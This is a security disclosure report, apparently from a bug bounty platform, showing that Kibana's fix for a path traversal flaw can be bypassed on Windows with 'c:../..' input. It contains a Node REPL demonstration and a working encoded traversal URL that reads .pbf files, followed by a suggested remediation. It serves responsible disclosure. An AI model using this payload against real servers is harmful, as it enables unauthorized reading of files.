Fix for CVE-2021-22151 (Kibana path traversal issue) can be bypassed on Windows
Low
Vulnerability Details
## Summary
Hello team, I hope you're doing well! I was combing through your GitHub repository to look at the fixes for recent security releases and found [the fix for CVE-2021-22151](https://github.com/elastic/kibana/pull/107768) to be incomplete. The current fix makes assumptions that are true on Linux but that don't hold on Windows.
## Details
The [fixed code](https://github.com/elastic/kibana/blob/62e7deee3c03cde99ae8f5da37352d0d5bd54d84/x-pack/plugins/maps/server/routes.js#L490-L494) looks like this:
```typescript
const range = path.normalize(request.params.range);
return range.startsWith('..')
  ? response.notFound()
  : new Promise((resolve) => {
      const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`);
      fs.readFile(fontPath, (error, data) => {
        // snipped
      });
    });
```
The assumption is that any path traversal attempt, once normalized, will start with `..`. This seems to hold on Linux; on Windows, however, the following can happen (using the Node.js REPL for demonstration here):
```javascript
> let range = path.normalize('c:../../../../../../../path_traversal')
undefined
> console.log(range)
c:..\..\..\..\..\..\..\path_traversal
> range.startsWith('..')
false
> const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`);
undefined
> console.log(fontPath)
c:\path_traversal.pbf
```
Path traversal happened even though `range` didn't start with `..`.
## Steps to reproduce
This requires Kibana to be installed on Windows.
1. Put a `.pbf` file somewhere on disk for demonstration. I did it with `echo hax > c:\path_traversal.pbf`
2. Visit <http://localhost:5601/api/maps/fonts/open_sans/c%3A..%2F..%2F..%2F..%2F..%2F..%2F..%2Fpath_traversal> and the file from the previous step will be downloaded
3. You might need to add some `..%2f` depending on how deep Kibana is installed.
## Remediation
Thom Heymann already had a great suggestion [in their code review](https://github.com/elastic/kibana/pull/107768/files#r683586289):
> The best way to solve this is to resolve the path from range and ensure it is inside your fonts directory.
I think this would fix the issue once and for all!
## Impact
Path traversal disclosing `.pbf` files
Report Stats
- Report ID: 1353603
- State: Closed
- Substate: resolved
- Upvotes: 9